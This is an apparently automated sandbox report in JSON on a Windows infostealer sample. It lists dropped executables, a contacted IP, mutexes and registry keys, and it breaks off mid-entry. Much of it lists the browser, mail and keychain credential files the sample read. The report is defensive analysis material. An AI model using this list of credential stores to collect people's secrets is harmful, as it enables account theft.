{ "analysis_details": { "creation_time": "2017-08-31 16:51 (UTC+2)", "execution_successful": true, "number_of_processes": 9, "termination_reason": "timeout", "type": "analysis_details", "version": 1, "vm_analysis_duration_time": "00:02:36" }, "artifacts": { "files": [ { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Temp\\38763.exe", "hashes": [ { "md5_hash": "1b1e6729790854252dfba6c77f198a4e", "sha1_hash": "327c94b435802f77d12913956b28c70d00ab2de5", "sha256_hash": "3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\temp\\38763.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z", "hashes": [], "norm_filename": "c:\\users\\atveydl98z", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\Desktop", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\email.doc", "hashes": [], "norm_filename": "c:\\email.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\a\\foobar.bmp", "hashes": [], "norm_filename": "c:\\a\\foobar.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe", "hashes": [], "norm_filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe:Zone.Identifier", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe:zone.identifier", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe", "hashes": [ { "md5_hash": "1b1e6729790854252dfba6c77f198a4e", "sha1_hash": "327c94b435802f77d12913956b28c70d00ab2de5", "sha256_hash": "3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\9F1C.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\9f1c.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\9F1B.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "fdf031de948302c61dede50cd61fa096", "sha1_hash": "d926af57565c1448dd81009ed90e324575e9b481", "sha256_hash": "370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\9f1b.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\9F2D.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\9f2d.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows Mail\\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows mail\\account{81ff0b87-dbd4-46a5-a9ff-ef000b2f9024}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows Mail\\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows mail\\account{a9b27062-9101-460a-98c0-c2aa26b0f943}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows Mail\\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows mail\\account{d08688db-6514-4dc0-9d54-33d56d2ef97e}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom_lng.ini", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom_lng.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Profiles", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Thunderbird\\Profiles", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\thunderbird\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Thunderbird", "hashes": [], "norm_filename": "c:\\program files\\mozilla thunderbird", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017083120170901\\index.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017083120170901\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017070520170706\\index.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017070520170706\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zcf30c9i.default\\places.sqlite", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\firefox\\profiles\\zcf30c9i.default\\places.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\web data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\webcache\\webcachev24.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zcf30c9i.default\\history.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\firefox\\profiles\\zcf30c9i.default\\history.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\firefox\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zcf30c9i.default\\logins.json", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\firefox\\profiles\\zcf30c9i.default\\logins.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zcf30c9i.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\firefox\\profiles\\zcf30c9i.default\\signons.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\sqlite3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\sqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\mozsqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Sea Monkey\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files\\sea monkey\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\crashpad\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\crashpad\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\origintrials\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\origintrials\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\pepperflash\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\pepperflash\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\pnacl\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\pnacl\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\swiftshader\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\swiftshader\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\swreporter\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\swreporter\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Opera\\Opera\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\opera\\opera\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\opera software\\opera stable\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "184.168.152.148", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "MF6003E70", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\I40F77A1B", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\M40F77A1B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "M68B1B0D0", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": 